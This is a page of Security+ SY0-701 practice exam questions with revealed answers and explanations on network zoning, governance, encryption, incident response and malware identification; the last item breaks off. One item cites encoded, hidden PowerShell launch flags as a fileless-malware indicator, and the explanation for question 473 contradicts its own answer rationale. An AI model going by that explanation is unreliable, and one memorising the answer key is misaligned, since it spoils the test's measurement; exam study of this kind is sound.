Security+ SY0-701 (SY0-701) — Questions 451525

1152 questions total · 16pages · All types, answers revealed

Page 6

Page 7 of 16

Page 8
451
Multi-Selectmedium

An online retailer is redesigning a network for a public web app. Customers must reach only the web tier from the internet. The web tier must reach the application tier, and the application tier must reach the database tier. Which two design changes best support this zoning model? Select two.

Select 2 answers
A.Place all three server tiers on the same flat VLAN and rely on host firewalls.
B.Put the internet-facing web tier in a DMZ with tightly filtered inbound rules.
C.Give the database server a public IP address so the web tier can connect faster.
D.Place the application and database tiers in separate internal zones with firewall allow-lists between them.
E.Use a single NAT device for all servers and disable interserver filtering.
AnswersB, D

A DMZ exposes only the web tier to the internet while keeping internal systems off the public network.

Why this answer

Option B is correct because placing the internet-facing web tier in a DMZ (demilitarized zone) with tightly filtered inbound rules ensures that external users can only reach the web servers, while the DMZ network isolates them from internal tiers. This aligns with the principle of defense in depth, where the DMZ acts as a buffer zone, and inbound rules (e.g., allowing only TCP/443 for HTTPS) minimize the attack surface. The web tier can then initiate outbound connections to the application tier through a firewall with specific allow-lists, maintaining strict segmentation.

Exam trap

The trap here is that candidates often confuse a flat VLAN with host firewalls as sufficient segmentation, not realizing that host firewalls can be disabled or bypassed once an attacker gains local access, whereas network-layer segmentation (e.g., DMZ and separate internal zones) provides a more robust security boundary that is harder to circumvent.

452
MCQeasy

A help desk team needs to update desktops in a call center without interrupting callers during peak hours. What is the best operational approach?

A.Deploy the updates immediately to all desktops at once
B.Schedule the updates during an approved maintenance window
C.Ask each user to install updates whenever they have time
D.Disable update notifications permanently
AnswerB

A maintenance window reduces user impact and gives the team predictable time to monitor the changes.

Why this answer

Scheduling updates during an approved maintenance window ensures that desktops are updated during a period of low activity, minimizing disruption to call center operations. This approach aligns with change management best practices, allowing for controlled deployment and rollback if issues arise, and avoids the performance degradation or reboots that could interrupt active calls.

Exam trap

The trap here is that candidates may choose immediate deployment (A) thinking it is the most efficient for security, overlooking the operational requirement to maintain service availability during peak hours.

How to eliminate wrong answers

Option A is wrong because deploying updates immediately to all desktops at once risks simultaneous reboots or performance slowdowns during peak hours, which would directly interrupt callers and violate availability requirements. Option C is wrong because asking each user to install updates whenever they have time lacks coordination and control; users may forget, delay, or apply updates inconsistently, leading to security gaps and unpredictable system behavior.

453
MCQhard

Based on the exhibit, what is the best governance improvement? Data handling procedure: - Managers may approve external sharing exceptions verbally. - Staff record exceptions in email threads. - No retention period is defined for exception evidence. Audit note: multiple exceptions could not be traced to an approver.

A.Replace verbal and email exceptions with a documented approval workflow and retained exception records.
B.Allow each team to decide its own exception format to increase flexibility.
C.Remove exception handling entirely so no external sharing can ever occur.
D.Keep the procedure unchanged and rely on additional awareness training alone.
AnswerA

A formal workflow creates traceable approvals, preserves evidence, and makes exception handling auditable later.

Why this answer

Option A is correct because the current procedure lacks a documented approval workflow and retention policy, which directly caused the audit finding that exceptions could not be traced to an approver. Implementing a formal, auditable process ensures non-repudiation and compliance with data handling governance, addressing the root cause rather than relying on informal verbal or email-based approvals.

Exam trap

The trap here is that candidates may think training alone (Option D) can fix a procedural gap, but the SY0-701 exam emphasizes that governance improvements require enforceable controls, not just awareness, to ensure accountability and auditability.

How to eliminate wrong answers

Option B is wrong because allowing each team to decide its own exception format would increase inconsistency and make auditing even more difficult, violating the principle of standardized governance. Option C is wrong because removing exception handling entirely is an extreme, impractical measure that would disrupt legitimate business needs for external sharing, and it does not address the governance gap in a balanced way. Option D is wrong because additional awareness training alone cannot fix the lack of a documented, auditable workflow; without a formal process, staff will continue using informal methods that fail to provide traceability.

454
Matchingeasy

Match each access principle to the best description.

Drag a concept onto its matching description — or click a concept then click the description.

Concepts
Matches

Give the user only the permissions needed to do the job.

Share only the information required for the assigned task.

Split important steps so one person cannot complete everything alone.

Verify each request instead of trusting a user just because they are internal.

Use multiple protective layers so one failure does not expose everything.

Why these pairings

Least privilege grants minimal permissions, separation of duties splits critical tasks, defense in depth uses multiple security layers, need-to-know restricts data access, RBAC assigns permissions by role, and accountability ensures traceability.

455
MCQmedium

A branch office needs to send a confidential design document to headquarters over an untrusted network. Headquarters already has the public/private key pair available for document exchange. Which method is most appropriate to keep the file confidential during transit without first sharing a secret key?

A.Encrypt the file with headquarters' public key
B.Publish a hash of the file for comparison
C.Sign the file with the branch office private key only
D.Compress the file before sending it
AnswerA

Only headquarters can decrypt the file with its matching private key, preserving confidentiality in transit.

Why this answer

Encrypting the file with headquarters' public key ensures that only headquarters, possessing the corresponding private key, can decrypt and read the file. This method provides confidentiality over an untrusted network without requiring a pre-shared secret key, as the public key can be freely distributed.

Exam trap

The trap here is that candidates confuse digital signatures (which provide authentication and integrity) with encryption (which provides confidentiality), leading them to choose signing the file instead of encrypting it.

How to eliminate wrong answers

Option B is wrong because publishing a hash of the file allows integrity verification but does not provide confidentiality; the file itself remains readable in transit. Option C is wrong because signing with the branch office's private key provides authentication and non-repudiation, not confidentiality; the file is still sent in plaintext. Option D is wrong because compression reduces file size but does not provide any cryptographic protection; the compressed data can still be read by anyone intercepting it.

456
Multi-Selectmedium

HR needs to share a copy of employee records with a benefits contractor for testing. The contractor only needs names and coverage selections, not Social Security numbers or bank details. Which two actions best satisfy data handling requirements? Select two.

Select 2 answers
A.Redact or mask unnecessary sensitive fields before sharing the file.
B.Send the full employee record set because the contractor is trusted.
C.Restrict access to the file to approved HR and project staff only.
D.Upload the file to a public collaboration site so the contractor can retrieve it easily.
E.Keep an unrestricted copy on multiple shared drives for convenience.
AnswersA, C

Data minimization is a core handling requirement. Removing SSNs, bank data, and other unnecessary fields reduces privacy risk and limits exposure if the test data is mishandled.

Why this answer

Option A is correct because redacting or masking sensitive fields like Social Security numbers and bank details ensures that the contractor receives only the necessary data (names and coverage selections) while protecting personally identifiable information (PII). This aligns with the principle of data minimization and compliance with regulations such as GDPR or HIPAA, which require that only the minimum necessary data be shared for a specific purpose. Masking techniques, such as replacing SSNs with placeholders or applying irreversible hashing, prevent unauthorized exposure even if the file is intercepted.

Exam trap

The trap here is that candidates may assume trust (option B) or convenience (option D or E) justifies sharing full data, but the exam emphasizes that data handling requirements always mandate minimizing exposure and enforcing access controls regardless of trust level.

457
Multi-Selectmedium

A business unit asks for a 30-day exception to use an unsupported browser plug-in on two engineering workstations while a replacement is tested. Which three conditions should be required before approval? Select three.

Select 3 answers
A.A documented business justification for why the plug-in is still needed.
B.A defined expiration date and review point before the exception can be extended.
C.A compensating control such as isolating the workstations from the general user network.
D.An open-ended waiver so the team can continue if testing slips.
E.Verbal approval only, with no written record.
AnswersA, B, C

A justified business need shows the exception supports a real operational requirement, not convenience.

Why this answer

Option A is correct because a documented business justification ensures that the exception is necessary and aligns with organizational risk appetite. Without a clear reason, the exception could be granted for convenience rather than critical need, undermining security governance. This justification also provides an audit trail for why an unsupported, potentially vulnerable plug-in is still in use.

Exam trap

The trap here is that candidates might think only one or two conditions are sufficient, but CompTIA expects all three—justification, expiration, and compensating controls—to be required for a valid exception approval.

458
MCQeasy

A Linux server starts showing many failed SSH logins from one source IP address. Which log source should the analyst review first?

A.The system authentication log
B.The printer spooler log
C.The browser history log
D.The backup completion log
AnswerA

This is the best choice because authentication logs record login attempts, failures, and success events. For SSH activity, the auth log or equivalent security log is the most direct place to confirm whether the attempts are real, what accounts were targeted, and whether any successful logon followed the failures. It provides the most useful first evidence for triage.

Why this answer

The system authentication log (e.g., /var/log/auth.log or /var/log/secure) records all SSH login attempts, including failed ones, along with source IP addresses. This is the primary log source for investigating authentication failures on Linux systems, as it captures PAM (Pluggable Authentication Module) events and SSH daemon messages.

Exam trap

The trap here is that candidates might confuse system authentication logs with generic system logs (e.g., /var/log/messages) or assume that SSH failures would be recorded in a network-level log, but the exam specifically tests knowledge of Linux authentication logging mechanisms.

How to eliminate wrong answers

Option B is wrong because the printer spooler log (e.g., /var/log/cups/) tracks print jobs and printer errors, not network authentication events like SSH logins. Option C is wrong because browser history logs are client-side records of web browsing activity, unrelated to server-side SSH authentication attempts. Option D is wrong because the backup completion log (e.g., /var/log/backup.log) records backup job statuses, not real-time authentication failures from remote IP addresses.

459
MCQhard

Based on the exhibit, what is the MOST likely activity taking place on the network? A user opened a spreadsheet shortly before unusual internal connection patterns began. The same account is now authenticating to many hosts in rapid succession.

A.A worm is flooding the network with broadcast traffic and exhausting bandwidth.
B.An attacker is performing lateral movement using stolen credentials and remote administration tools.
C.A malicious insider is exfiltrating data through a cloud sync application.
D.A misconfigured printer is repeatedly scanning the subnet for available services.
AnswerB

The mix of SMB, WinRM, remote logons, Kerberos activity, and PsExec service creation is consistent with movement from one compromised workstation to multiple internal hosts.

Why this answer

The exhibit shows a user opening a spreadsheet (likely a phishing vector) followed by rapid authentication attempts from the same account to many hosts. This pattern matches lateral movement using stolen credentials, where an attacker uses remote administration tools like PsExec, WinRM, or RDP to move across the network after initial compromise.

Exam trap

The trap here is confusing lateral movement with network scanning or data exfiltration; candidates often overlook that the same account authenticating to many hosts is a hallmark of credential-based lateral movement, not a misconfiguration or worm.

How to eliminate wrong answers

Option A is wrong because a worm flooding broadcast traffic would generate excessive broadcast packets (e.g., ARP or ICMP floods), not sequential authentication events to specific hosts. Option C is wrong because data exfiltration via cloud sync would show outbound traffic to cloud storage APIs, not internal authentication bursts. Option D is wrong because a misconfigured printer scanning the subnet would use protocols like SNMP or mDNS discovery, not repeated authentication attempts with the same user account.

460
Multi-Selecthard

A responder has imaged a suspect laptop and needs to preserve the evidence for possible legal action. Which three actions best support chain of custody and admissibility? Select three.

Select 3 answers
A.Document the evidence identifier, collector, date, time, and location on the chain-of-custody form.
B.Calculate and record cryptographic hashes for the original evidence and the forensic image.
C.Place the original device in a sealed, access-controlled evidence locker after collection.
D.Mount the original drive read/write so investigators can search it faster.
E.Rename the image file to match the case number before hashing it.
AnswersA, B, C

Complete documentation shows who handled the evidence and when, which helps establish a defensible custody history.

Why this answer

Option A is correct because documenting the evidence identifier, collector, date, time, and location on the chain-of-custody form establishes a clear, auditable record of who handled the evidence and when. This documentation is essential for proving the evidence has not been tampered with and is admissible in court. Without this detailed logging, the chain of custody is broken, and the evidence may be challenged.

Exam trap

The trap here is that candidates may think renaming a file is harmless, but any alteration—including metadata changes—breaks the hash integrity required for evidence admissibility.

461
MCQeasy

Employees sign in once to the company portal and then can access email, the ticketing system, and the HR site without logging in again. What is this called?

A.Single sign-on
B.Port forwarding
C.Tokenization
D.Network address translation
AnswerA

SSO lets a user authenticate once and access multiple integrated services without repeated logins.

Why this answer

Single sign-on (SSO) allows a user to authenticate once and gain access to multiple applications or systems without re-entering credentials. In this scenario, the company portal acts as the identity provider (IdP), and after initial authentication, it issues a token (e.g., SAML assertion or Kerberos ticket) that is accepted by the email, ticketing, and HR systems as proof of identity. This eliminates the need for repeated logins across these services.

Exam trap

The trap here is that candidates confuse single sign-on with tokenization, because both involve 'tokens,' but tokenization is a data protection method for sensitive data, not an authentication mechanism for accessing multiple applications.

How to eliminate wrong answers

Option B is wrong because port forwarding is a network address translation (NAT) technique that redirects traffic from one IP address and port to another, typically used to expose internal services to the internet, not to manage authentication across multiple applications. Option C is wrong because tokenization replaces sensitive data (like credit card numbers) with a non-sensitive placeholder (token) for security, but it does not provide a mechanism for authenticating a user once and accessing multiple systems. Option D is wrong because network address translation (NAT) modifies IP address information in packet headers to map private addresses to public ones, and has no role in authentication or session management across applications.

462
MCQmedium

Network engineers need to manage switches in a data center from home. The solution must encrypt management traffic, strongly authenticate users, and avoid exposing management ports directly to the internet. Which approach is best?

A.Telnet to the switches over a router port-forward rule.
B.SSH directly to the switches from the internet using password-only authentication.
C.Use SNMPv2c with restricted source IP addresses.
D.Connect through a VPN to a bastion host, then use SSH to the switches.
AnswerD

A VPN hides management interfaces from the public internet, and a bastion host provides a controlled jump point for secure administration.

Why this answer

Option D is correct because it combines a VPN (which encrypts all traffic and provides strong authentication) with a bastion host (a hardened jump server) to avoid exposing switch management interfaces directly to the internet. SSH then provides encrypted, authenticated access to the switches from the bastion host, meeting all three requirements: encryption, strong authentication, and no direct internet exposure.

Exam trap

The trap here is that candidates often think SSH alone (Option B) is sufficient because it encrypts traffic, but they overlook the requirement to avoid exposing management ports directly to the internet, which is a critical security design principle tested in SY0-701.

How to eliminate wrong answers

Option A is wrong because Telnet transmits all data, including passwords, in cleartext (no encryption) and port-forwarding exposes the switch management port directly to the internet, violating the requirement to avoid direct exposure. Option B is wrong because SSH does provide encryption, but allowing direct SSH from the internet exposes the switch management port and password-only authentication is not considered strong authentication (lacks multi-factor or key-based methods). Option C is wrong because SNMPv2c uses community strings in cleartext (no encryption) and provides only weak authentication; restricting source IPs does not encrypt traffic or provide strong user authentication.

463
Multi-Selecthard

An endpoint investigation shows winword.exe launching powershell.exe with -nop -w hidden -enc arguments. The same host also has a newly created WMI permanent event subscription, and no new executable has appeared in Downloads or Program Files. Which two findings are most consistent with a fileless compromise and persistence mechanism? Select two.

Select 2 answers
A.PowerShell was launched with encoded, hidden execution arguments from a document process.
B.A WMI permanent event subscription was created under the root\subscription namespace.
C.A new executable named updater.exe was copied into Program Files by an administrator.
D.The browser cache was cleared after a routine user sign-out.
E.A signed video driver updated successfully through Windows Update.
AnswersA, B

Encoded and hidden PowerShell launched from a document process is a strong fileless malware indicator. The attack uses built-in scripting rather than dropping a traditional executable, which helps evade file-based detections. In combination with a user-facing process like Word, this pattern commonly suggests initial execution through malicious content or macro abuse.

Why this answer

Option A is correct because the use of winword.exe to launch powershell.exe with `-nop -w hidden -enc` arguments is a classic fileless execution technique. The encoded command runs entirely in memory without writing a payload to disk, and the launch from a document process (winword.exe) indicates a macro or exploit-based initial access, consistent with a fileless compromise.

Exam trap

The trap here is that candidates may think any persistence mechanism (like a new executable in Program Files) is fileless, but fileless specifically means no executable written to disk, and WMI subscriptions are a common fileless persistence vector.

464
MCQmedium

Based on the exhibit, what is the best governance action before the sales team uses the legacy portal without MFA?

A.Update the policy immediately to allow password-only access for all legacy systems.
B.Create a formal time-bound exception with compensating controls, approval, and an expiration date.
C.Have the help desk approve the request informally in the ticket and proceed without further documentation.
D.Ignore the MFA requirement because the portal is owned by a trusted partner.
AnswerB

A formal exception preserves the existing policy while allowing a documented, limited deviation for business need. It should include a risk owner approval, compensating controls such as stricter monitoring or network restrictions, and a review or expiration date so the exception does not become permanent.

Why this answer

Option B is correct because governance requires that any exception to a security policy (such as bypassing MFA) must be formally documented, approved by management, time-bound, and include compensating controls to mitigate risk. In this scenario, the legacy portal lacks MFA support, so a formal exception with an expiration date ensures the risk is tracked and re-evaluated, rather than permanently weakening security posture.

Exam trap

CompTIA often tests the distinction between an informal workaround and a formal governance process, trapping candidates who think a quick approval or policy change is sufficient without understanding the need for documented risk acceptance and compensating controls.

How to eliminate wrong answers

Option A is wrong because immediately updating the policy to allow password-only access for all legacy systems would permanently weaken the security baseline and violate the principle of least privilege, rather than addressing the specific legacy portal issue with a controlled exception. Option C is wrong because informal help desk approval without documentation bypasses audit trails and accountability, failing to meet governance requirements for risk acceptance and compliance. Option D is wrong because ignoring the MFA requirement simply because the portal is owned by a trusted partner disregards the principle of defense in depth and assumes trust without verification, which is a common security failure.

465
Multi-Selectmedium

After a merger, dozens of laptops arrive with inconsistent settings and a history of unsupported utilities installed by the previous owner. The security team wants to establish a known-good configuration, reduce future drift, and accelerate remediation of newly discovered vulnerabilities. Which three actions best support that goal? Select three.

Select 3 answers
A.Build and deploy a secure baseline or gold image for the laptops.
B.Use centralized patch management with staged rollouts and reporting.
C.Enforce configuration management that reapplies approved settings after drift is detected.
D.Allow each user to customize local security settings for productivity.
E.Skip validation after patching because the baseline will always remain correct.
AnswersA, B, C

A secure baseline establishes the approved configuration for the fleet and gives the team a repeatable starting point. A gold image reduces configuration variation from device to device and makes it easier to verify what should be present. It is the most direct way to normalize inherited systems after a merger or acquisition.

Why this answer

A is correct because building and deploying a secure baseline or gold image ensures all laptops start from a known-good configuration, eliminating inconsistencies and unsupported utilities from the previous owner. This directly supports the goal of establishing a trusted state and provides a reference point for detecting future drift.

Exam trap

The trap here is that candidates may think user customization (Option D) is acceptable for productivity, but the scenario explicitly requires a known-good configuration and reduced drift, making any uncontrolled customization counterproductive.

466
Multi-Selecteasy

Which two practices help protect encryption keys? Select two.

Select 2 answers
A.Store keys in a hardware security module
B.Rotate keys on a defined schedule
C.Put keys in an unencrypted text file on a server
D.Reuse the same key across many systems forever
E.Send keys through a public chat room
AnswersA, B

An HSM helps protect keys by keeping them isolated from direct exposure.

Why this answer

A hardware security module (HSM) is a dedicated, tamper-resistant hardware device designed to securely generate, store, and manage cryptographic keys. By keeping keys inside the HSM, they never exist in plaintext in system memory or on disk, and operations like signing or decryption occur within the HSM's secure boundary, preventing extraction even if the host is compromised.

Exam trap

The trap here is that candidates may think storing keys in a file with restricted permissions (e.g., chmod 600) is sufficient, but the SY0-701 exam expects you to recognize that only hardware-based isolation (HSM) and scheduled rotation are proper key protection practices.

467
MCQeasy

After a user installs a free PDF converter from an unofficial website, the laptop starts making periodic outbound connections to an unknown server, the browser homepage changes, and a new program launches at logon. What is the most likely malware type?

A.Worm
B.Trojan
C.Rootkit
D.Ransomware
AnswerB

This is the best answer because the malicious software was disguised as a useful free tool. The symptoms include persistence, browser changes, and communication with an unknown server, which are common signs of a trojan payload. Trojans often arrive through deceptive downloads and then install additional harmful behavior after execution.

Why this answer

The user downloaded and installed a program that appears legitimate (a PDF converter) but performs malicious actions: making outbound connections, changing browser settings, and adding a startup program. This is the classic behavior of a Trojan horse, which disguises itself as useful software to trick users into installing it, then executes hidden malicious functions. Unlike worms, Trojans do not self-replicate, and unlike ransomware or rootkits, the described symptoms focus on unauthorized remote access and persistence rather than file encryption or deep OS concealment.

Exam trap

The trap here is that candidates may confuse the self-replicating behavior of a worm with the user-initiated installation of a Trojan, or mistake the visible symptoms (browser change, startup entry) for a rootkit's stealth, when in fact Trojans often exhibit overt persistence mechanisms to maintain access.

How to eliminate wrong answers

Option A is wrong because a worm self-replicates and spreads across networks without user interaction, whereas this infection required the user to manually install a program. Option C is wrong because a rootkit is designed to hide its presence and maintain privileged access by subverting OS-level detection mechanisms, not to change browser homepages or add visible startup entries. Option D is wrong because ransomware typically encrypts files and demands payment, displaying a ransom note, whereas the described symptoms involve outbound connections and browser changes without file encryption or extortion.

468
MCQmedium

A security analyst in the SOC is reviewing an alert from the corporate VPN server. The alert indicates that user 'jsmith' authenticated successfully from an IP address in Brazil at 14:30 UTC. The analyst contacts jsmith, who confirms he is physically in the company's headquarters in Chicago and has not remotely accessed the VPN today. The VPN authentication logs show that jsmith's session used a valid smart card certificate for authentication. The analyst checks the certificate revocation list and finds that jsmith's certificate has not been revoked. Which of the following is the most likely explanation for this event?

A.The user's smart card and PIN were stolen, allowing an attacker to authenticate from Brazil.
B.An attacker performed a pass-the-hash attack using cached credentials from jsmith's workstation.
C.The VPN server's certificate was forged, allowing the attacker to intercept jsmith's credentials.
D.The user's account password was guessed through a brute-force attack and then used to create a new certificate.
AnswerA

Correct. Smart card authentication requires possession of the physical card and the PIN. If both are stolen, an attacker can impersonate the user.

Why this answer

Option A is correct because the scenario describes a successful VPN authentication using a valid smart card certificate from a location (Brazil) that the legitimate user (jsmith) denies accessing. Since the certificate was not revoked and the smart card requires both the card and PIN for use, the most plausible explanation is that both were stolen, enabling an attacker to authenticate as jsmith. The certificate revocation list (CRL) check confirms the certificate is still valid, ruling out revocation-based defenses, and the user's physical presence in Chicago eliminates the possibility of a legitimate remote session.

Exam trap

The trap here is that candidates may assume a valid certificate and successful authentication imply the user is legitimate, overlooking that physical theft of the smart card and PIN allows an attacker to authenticate as the user without any cryptographic anomaly.

How to eliminate wrong answers

Option B is wrong because a pass-the-hash attack exploits NTLM hash caching for authentication, but the VPN session used a smart card certificate (PKI-based authentication), not a password hash. Pass-the-hash is irrelevant to certificate-based authentication mechanisms. Option C is wrong because a forged VPN server certificate would enable a man-in-the-middle attack to intercept credentials, but it would not allow an attacker to authenticate as jsmith using his valid smart card certificate; the attacker would need jsmith's private key and PIN, which are not obtained by forging the server certificate.

469
MCQmedium

EDR alerts on a remote laptop show a suspicious process attempting to dump browser credentials and then contacting a rare domain. The user is in another time zone and still needs the laptop online for a presentation later today. What containment action is best?

A.Remotely isolate the device through the EDR console while keeping it powered on.
B.Ask the user to uninstall the EDR agent and reboot the laptop.
C.Wait until after the presentation and then begin containment.
D.Email the user asking them to close the browser and log out of their accounts.
AnswerA

EDR isolation is the best containment action because it stops most network communication while preserving the device state for investigation. Keeping the endpoint powered on maintains access to volatile evidence and avoids unnecessary disruption to disk contents or running processes. This is especially useful when the user is remote, because it can contain the threat quickly without requiring physical access or a full shutdown that would erase useful forensic data.

Why this answer

Remotely isolating the device through the EDR console is the best containment action because it immediately blocks all network communication to and from the laptop while keeping it powered on and running. This prevents the suspicious process from exfiltrating browser credentials or communicating with the rare command-and-control domain, yet allows the user to continue using local applications for the presentation later today. EDR isolation typically works by applying a host-based firewall rule that drops all traffic except to the EDR management server, ensuring the threat is contained without disrupting local productivity.

Exam trap

The trap here is that candidates may choose to wait until after the presentation (Option C) due to business continuity concerns, failing to recognize that immediate containment via network isolation can preserve both security and productivity.

How to eliminate wrong answers

Option B is wrong because asking the user to uninstall the EDR agent removes the very tool needed to monitor and contain the threat, leaving the laptop defenseless and potentially allowing the malicious process to continue unchecked. Option C is wrong because waiting until after the presentation gives the attacker time to exfiltrate sensitive credentials and establish persistence, violating the fundamental incident response principle of immediate containment. Option D is wrong because emailing the user to close the browser and log out does not stop the suspicious process from running in the background or prevent it from communicating with the rare domain, and the user may not act promptly or correctly.

470
MCQmedium

A finance team receives emails that appear to come from the CEO's assistant and ask them to review a document. Several users entered their passwords on a fake login page, and the attackers then signed in from a new country using the same credentials. Which control most directly reduces successful account takeover if a password is stolen?

A.Require password changes every 30 days for all users.
B.Use phishing-resistant MFA such as FIDO2 or WebAuthn.
C.Turn off all external email to eliminate the chance of future messages.
D.Use single sign-on without MFA so users authenticate only once.
AnswerB

Phishing-resistant multifactor authentication is the strongest choice here because it prevents a stolen password from being enough to log in. The attacker already harvested credentials through a fake login page, so a second factor that cannot be easily replayed from another site directly disrupts the attack path. FIDO2 or WebAuthn reduces the value of captured passwords and helps stop account takeover even when users are deceived by convincing impersonation emails. This is a practical defense against credential phishing and replay.

Why this answer

Phishing-resistant MFA, such as FIDO2 or WebAuthn, directly prevents account takeover even when a password is stolen because these methods use public-key cryptography and origin-bound credentials. The fake login page cannot intercept the private key or replay the authentication, so the attacker cannot sign in from a new country despite having the password.

Exam trap

The trap here is that candidates often choose password rotation (Option A) as a security best practice, but the question specifically asks for the control that most directly reduces successful account takeover when a password is already stolen, which is phishing-resistant MFA, not password aging.

How to eliminate wrong answers

Option A is wrong because requiring password changes every 30 days does not prevent an attacker from using a stolen password immediately; it only reduces the window of exposure after the fact, and frequent changes can actually encourage weaker passwords. Option C is wrong because turning off all external email is an impractical and overly restrictive measure that does not address the core issue of credential theft; attackers could still use other vectors like internal phishing or compromised accounts. Option D is wrong because single sign-on without MFA consolidates authentication to a single point of failure; if the password is stolen, the attacker gains access to all linked systems without additional barriers.

471
Multi-Selecthard

An accounts payable specialist receives an email inside an existing vendor thread that asks for a last-minute bank-account change before a payment run. The wording is professional, the signature matches, and the request is urgent. Which three actions should the specialist take? Select three.

Select 3 answers
A.Verify the request through a known out-of-band contact method for the vendor.
B.Pause the payment and require secondary approval before any bank details are updated.
C.Report the message through the security and vendor-validation process.
D.Reply in the same thread because the address and signature look legitimate.
E.Process the change immediately to avoid delaying the vendor relationship.
AnswersA, B, C

Out-of-band verification breaks the attacker’s control of the compromised email thread and confirms the change independently.

Why this answer

Option A is correct because verifying the request through a known out-of-band contact method (e.g., a phone call to a previously documented vendor number) directly mitigates the risk of business email compromise (BEC). Attackers often hijack or spoof legitimate email threads, so in-band verification (replying within the thread) is unreliable. This aligns with the principle of dual control and independent verification for sensitive financial changes.

Exam trap

The trap here is that candidates assume a professional-looking email with a matching signature is sufficient proof of authenticity, overlooking that BEC attacks can perfectly replicate these details within a compromised thread.

472
MCQmedium

A backup server encrypts large nightly database exports before sending them to an offsite storage system. The organization has already arranged a secure way to share the secret key between the systems, and performance is a concern because the files are very large. Which encryption approach is the best fit?

A.Asymmetric encryption
B.Symmetric encryption
C.Hashing
D.Digital signatures
AnswerB

Symmetric encryption is the best fit for bulk data because it is fast and efficient. When both sides can securely share the same secret key, large backup files can be encrypted and decrypted with much less overhead than with public-key methods. That makes it the standard choice for protecting high-volume data at rest or in transit.

Why this answer

Symmetric encryption (e.g., AES-256) is the best fit because it uses a single shared secret key for both encryption and decryption, offering significantly higher throughput than asymmetric methods. For large files like nightly database exports, symmetric ciphers are hardware-accelerated (e.g., AES-NI) and introduce minimal performance overhead, while the secure key exchange is already handled separately.

Exam trap

The trap here is that candidates often choose asymmetric encryption because they associate it with 'secure key sharing,' forgetting that the scenario explicitly states the key exchange is already handled, so the focus should be on performance for large data volumes.

How to eliminate wrong answers

Option A is wrong because asymmetric encryption (e.g., RSA, ECC) is computationally expensive—typically 100–1000× slower than symmetric encryption—making it impractical for bulk encrypting large files; it is better suited for key exchange or small payloads. Option C is wrong because hashing is a one-way function (e.g., SHA-256) that produces a fixed-size digest and cannot be reversed to recover the original data, so it is used for integrity verification, not confidentiality.

473
MCQmedium

Based on the exhibit, what is the most likely explanation for the alert?

A.The workstation has been redirected to an approved corporate proxy, so the event is expected.
B.A DNS cache poisoning attack is in progress and the workstation is now using a rogue gateway.
C.The endpoint is infected with malware that is hiding its traffic through encrypted tunnels.
D.The workstation is under a denial-of-service attack because it sent repeated DNS lookups.
AnswerA

The exhibit shows the workstation resolving WPAD, retrieving the proxy auto-configuration file, and then sending traffic to the approved proxy listed in inventory. Those steps match normal browser proxy discovery, not malicious behavior. Because the destination is the known corporate proxy, the alert should be validated as legitimate and then tuned if it repeatedly fires on the same approved sequence.

Why this answer

The alert indicates that the workstation's DNS traffic is being redirected to an internal proxy server (10.0.0.53), which is a common configuration in corporate environments for content filtering and security monitoring. Since the destination IP (10.0.0.53) is within the organization's private IP range and the proxy is explicitly approved, this behavior is expected and not malicious. The event is consistent with a transparent proxy or DNS-based proxy redirection, where the workstation's DNS queries are intercepted and forwarded to the corporate proxy.

Exam trap

The trap here is that candidates often assume any DNS redirection to an internal IP indicates a man-in-the-middle attack or DNS poisoning, but they overlook that corporate proxies legitimately use this technique for security monitoring and content filtering.

How to eliminate wrong answers

Option B is wrong because DNS cache poisoning would involve a rogue DNS server returning forged responses, not a consistent redirection to an internal proxy IP; the exhibit shows the workstation's DNS queries going to 10.0.0.53, which is a private IP, not a spoofed external address. Option C is wrong because malware using encrypted tunnels would typically show traffic to an external C2 server over protocols like HTTPS or DNS over HTTPS, not a consistent pattern of DNS queries to a known internal proxy IP. Option D is wrong because a denial-of-service attack would involve an overwhelming volume of traffic or resource exhaustion, not a single workstation sending DNS lookups to a proxy; repeated DNS lookups alone do not indicate a DoS attack.

474
MCQmedium

A security analyst at a manufacturing company notices multiple workstations generating high volumes of encrypted outbound traffic and displaying ransom notes. The analyst suspects a ransomware outbreak. According to the incident response process, which of the following should the analyst perform FIRST?

A.Immediately wipe the hard drives of all affected workstations and reinstall the operating system.
B.Isolate the affected workstations from the network by disconnecting their network cables and disabling Wi-Fi.
C.Contact local law enforcement to report the ransomware incident and request a forensic investigation.
D.Conduct a full forensic analysis of one affected workstation to determine the ransomware variant and entry vector.
AnswerB

This is the correct first step. Rapid containment (isolation) limits the scope of the incident and prevents the ransomware from encrypting additional systems or exfiltrating data.

Why this answer

The first priority in a suspected ransomware outbreak is containment to prevent lateral spread and further encryption. Disconnecting network cables and disabling Wi-Fi immediately isolates the affected workstations from the network, stopping the ransomware from communicating with its command-and-control (C2) server or encrypting additional systems. This aligns with the NIST SP 800-61 incident response lifecycle, where containment precedes eradication and recovery.

Exam trap

The trap here is that candidates often jump to eradication (wiping drives) or notification (calling law enforcement) first, forgetting that containment is the immediate priority to stop the outbreak from spreading across the network.

How to eliminate wrong answers

Option A is wrong because immediately wiping hard drives destroys forensic evidence and prevents analysis of the ransomware variant, infection vector, and scope of compromise, which is critical for understanding and preventing future incidents. Option C is wrong because contacting law enforcement is a notification step that occurs after containment and initial analysis; delaying containment to call authorities allows the ransomware to continue spreading and causing more damage.

475
Multi-Selecthard

A server is suspected of being used for lateral movement after the SOC notices dozens of failed SSH logons, then a successful login from a new source IP, followed by new outbound SMB connections to internal hosts. The system is still running. Which two items should be collected first before any reboot or remediation? Select two.

Select 2 answers
A.A current list of logged-in users and active sessions, because it shows who has access right now.
B.Live network connection information, because it shows current remote targets and suspicious channels.
C.The server’s warranty status, because hardware replacement may be needed later.
D.A fresh operating system patch, because updating quickly reduces all risk.
E.A user satisfaction survey, because affected staff can describe what they noticed.
AnswersA, B

Active session information is volatile and can disappear on reboot. It helps identify whether a legitimate user, compromised account, or attacker shell is currently present on the server. That makes it one of the highest-value items to capture first.

Why this answer

Option A is correct because capturing a current list of logged-in users and active sessions provides immediate visibility into which accounts are currently authenticated and potentially being used by an attacker for lateral movement. This data is volatile and would be lost upon reboot, making it critical to collect before any remediation. In this scenario, the successful SSH login from a new source IP suggests an attacker may have established a foothold, and knowing active sessions helps identify compromised accounts and ongoing access.

Exam trap

The trap here is that candidates may prioritize remediation actions like patching or hardware checks over preserving volatile forensic evidence, failing to recognize that live user sessions and network connections are the most time-sensitive data to collect before any system change.

476
MCQeasy

HR needs to send a benefits contractor a file for testing, but the contractor only needs employee names and plan selections. What is the best action before sharing the file?

A.Send the full file because the contractor is trusted
B.Remove all fields the contractor does not need for the task
C.Post the file to a public collaboration site with a password
D.Rename the file so the contents are harder to identify
AnswerB

Data minimization is the best choice because the contractor should receive only the information required to complete the testing task.

Why this answer

